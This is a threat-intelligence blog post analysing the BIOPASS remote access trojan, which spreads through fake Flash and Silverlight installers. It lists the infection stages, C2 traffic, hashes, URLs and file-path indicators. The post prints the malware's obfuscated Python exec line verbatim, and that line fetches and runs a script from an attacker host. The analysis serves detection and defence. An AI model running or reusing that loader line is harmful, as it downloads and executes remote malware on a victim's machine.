SecneurX has been observing a RAT (Remote Access Trojan) behaviour which is targeting users of Windows systems through the watering hole attack. This RAT is now referred as BIOPASS RAT.
The details shared in this blog are from the artifacts acquired from the wild using SecneurX acquisition Engine. SecneurX analysed these artifacts using SecneurX Advanced Dynamic Malware Analysis Platform and generated IOC’s (Indicators of Compromise), Malware’s behavioural analysis report and Threat Signatures that can be consumed by SOC / Security Analysts.
Victims are tricked into downloading a malware loader which is disguised as a legitimate installer like Adobe Flash Player or Microsoft Silverlight. This malware sets up a back-door entry for the Command & Control (C2) to control the victim’s system. It then downloads a tool-kit containing many tools to, capture screen shots, stream desktop content, steal credentials etc and waits for C2 to initiate the commands. Next, it establishes a socket connection with C2 that is running on a public cloud to exfiltrate data.
This malware has the potential to cause serious data exfiltration. It is important to watch your logs for any IOC’s mentioned at the end of this blog. A detailed analysis of the behaviour of BIOPASS RAT with network and process information is being discussed in-detail for interested readers. Preventive steps can be taken based on the IOC’s and behavioural report attached in this blog.
An analysis of the threat scenario is explained below.
Victims are tricked to download the malicious installers like Flash, Silverlight when they access compromised websites.
While installing, the malware downloads the genuine flash or silverlight installer from their custom source, like in this url.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe
The malware downloads a script (Python) from C2.
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua
This python script checks if the machine is already compromised or not, by checking whether there are listeners in specific port numbers - 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, 62880
If the machine is not compromised already, it downloads subsequent payload.
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua
hxxp://lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
The final payload was an obfuscated payload as listed below. It was decoded to extract the BIOPASS RAT payload url.
Obfuscated payload
"exec(b''.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f626967322e70792729292e7265616428292e6465636f6465282929').decode())"
BIOPASS RAT URL after decoding
hxxp://flashdownloadserver.oss-accelerate[.]aliyuncs[.]com/r2/big2.py
The payload that was downloaded as mentioned in Step 4, contains a Toolkit that was downloaded from below URL.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
The contents of the toolkit is shown in the below image. The toolkit contains python environment and its dependencies.
The BIOPASS RAT malicious script is downloaded from the below URL.
hxxp://flashdownloadserver.oss-accelerate.aliyuncs[.]com/r2/big2.py
To periodically start these dowloaded binaries, an entry is created in the Task scheduler.
BIOPASS malware script contains following tasks which can be initiated by the C2 to execute
This Malware can also deploy the cobalt strike payload from the below URL which was obfuscated in the code
hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222.txt
Payload:
Communication between the infected node and C2 is base85 encoded , compressed and AES encrypted.
Encrypted data
42["join",{"type":"client","data":"c$@*?03ZJ>jH4D#UVpo?^o7<}6%{}fj4Jv$ey?7woLCG3L!Pm^m)lSCttTFO7D$5<X6BZHa1nx)c>OG(KaGrvxrSQd(1I1tfz!&K08>;NY1S_`J<a&pbp*w^~_m80=BEu9&gKLyp*oYc7nk>4S(7+9BCV_an;BR4a`Ws|@yGxqYJdJ3>FixK5Q)ix8W@b~cnwK4K`D$#%B0div=dos=htppsbZx4Qh=@QEkVEVI72G7t>wy@u~0{zd#NJPIskliVsu=np$e^v5e1pSn)8T-{UJJW|MCWob("}]
Decrypted data:
{"do": "k", "ips": "192.168.17.132", "public_ip": "157.49.4.95", "osv": "Windows 7 x64", "cuser": "win-l842sfcie1t\\administrator", "pid": 2760, "key": "null", "uid": "1", "av": "N/A", "city": " \u70\ua6"}
C2 issues multiple commands like grab a screen shot, get browser history or stream the desktop and the Malware will execute and exfiltrate those data.
Hashes
e3183f52a388774545882c6148613c67a99086e5eb8d17a37158fc599ba8254b
69d930050b2445937ec6a4f9887296928bf663f7a71132676be3f112e80fe275
b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c
bdf7ebb2b38ea0c3dfb13da5d9cc56bf439d0519b29c3da61d2b2c0ab5bc6011
bf4f50979b7b29f2b6d192630b8d7b76adb9cb65157a1c70924a47bf519c4edd
6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e
b041e6269143175c32737be0345fca5574039cc8df37f06effdd93131a3b8dd5
8445c0189735766edf0e3d01b91f6f98563fef272ac5c92d3701a1174ad072dd
cddff76910cafdc30d80e383efb801ebdcee5bdb95c2e84af25935be45fde053
cbd7b4afc69e7e68893a52096bb1bd8c2f89c7c0da32771169a4bfe13efe8698
Indicators Of Compromise
hxxp[:]//softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe
hxxp[:]//lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua
hxxp[:]//lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua
hxxp[:]//lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll
hxxp[:]//softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
hxxp[:]//flashdownloadserver[.]oss-accelerate[.]aliyuncs[.]com/r2/big2[.]py
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/Online[.]txt
hxxp[:]//d[.]pythonlabs[.]net[:]39999/socket[.]io/?transport=polling&EIO=3&t=1626096081[.]4416115
hxxp[:]//d[.]pythonlabs[.]net[:]39999/socket[.]io/?transport=websocket&EIO=3&sid=86787aa8f944daf83f46aba2021&t=1626096084[.]6552172
hxxp[:]//pythonlabs[.]oss-accelerate[.]aliyuncs[.]com/sc[.]exe
hxxp[:]//pythonlabs[.]oss-accelerate[.]aliyuncs[.]com/V2%2F93446a%2FChrome%2FBookmarks%2F1626096085[.]7940192_Bookmarks
hxxp[:]//pythonlabs[.]oss-accelerate[.]aliyuncs[.]com/V2%2F93446a%2FChrome%2FHistory%2F1626096085[.]762819_History
hxxp[:]//lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/pngquant[.]exe
hxxps[:]//softres[.]oss-accelerate[.]aliyuncs[.]com/rce[.]payload
hxxp[:]//www[.]flash[.]cn/enterprise/index
hxxp[:]//www[.]flash[.]cn/education/index
hxxp[:]//www[.]flash[.]cn/help/index
hxxp[:]//www[.]flash[.]cn/notice/index
hxxp[:]//www[.]flash[.]cn/category/contact
hxxp[:]//www[.]flash[.]cn/category/agreement
hxxp[:]//www[.]flash[.]cn/Flash_Helper_Service_Agreement[.]pdf
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/ServiceHub[.]zip
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/vc_redist[.]x86[.]exe
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/ffa[.]exe
hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222[.]txt
hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/cdaemon[.]txt
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/xss[.]txt
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/script[.]txt
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/ignore[.]json
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/script[.]txt
hxxp[:]//ciscobinary[.]openh264[.]org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a
391d521[.]zip
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res%2Ffiles[.]zip
hxxp[:]//chinanode[.]microsoft-update-service[.]com/socket[.]io/?transport=polling&EIO=3&t=1626342488[.]2829416
hxxp[:]//chinanode[.]microsoft-update-service[.]com/socket[.]io/?transport=polling&EIO=3&sid=be6c4f0c96be4e91e99285204664&t=1626342489[.]718144
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/V2%2Fb6e8c5%2FChromeN%2FBookmarks%2F1626342490[.]669746_Bookmarks
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/V2%2Fb6e8c5%2FChromeN%2FHistory%2F1626342490[.]5917456_History
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/V2%2Fb6e8c5%2Fscreenshot%2F1626342491[.]886548_92669[.]png
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/unzip[.]exe
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/flashplayerpp_install_cn[.]exe
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/cdaemon[.]txt
hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/xxa[.]txt
Device Indicators
C:\Users\ADMINI~1\AppData\Local\Temp\lua.zip
C:\ProgramData\lua\lua\socket\smtp.lua
C:\ProgramData\lua\lua\socket
C:\ProgramData\lua\lua.exe
C:\ProgramData\lua\effil.dll
C:\Users\Administrator\AppData\Roaming\Silverlight.exe
C:\Windows\System32\Tasks\Silverlight
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\administrator@msn[1].txt
C:\ProgramData\lua\ScheduleTask.dll
C:\ProgramData\ShellExperienceHost\api-ms-win-crt-stdio-l1-1-0.dll
C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\task_queue.py
C:\Windows\System32\Tasks\ShellExperIenceHost
Behaviour report
Conclusion
Given the nature of the malware, we advise users to be careful with regard to the applications that they download. Organisations can take preventive steps based on the IOC’s and behavioural report attached in this blog.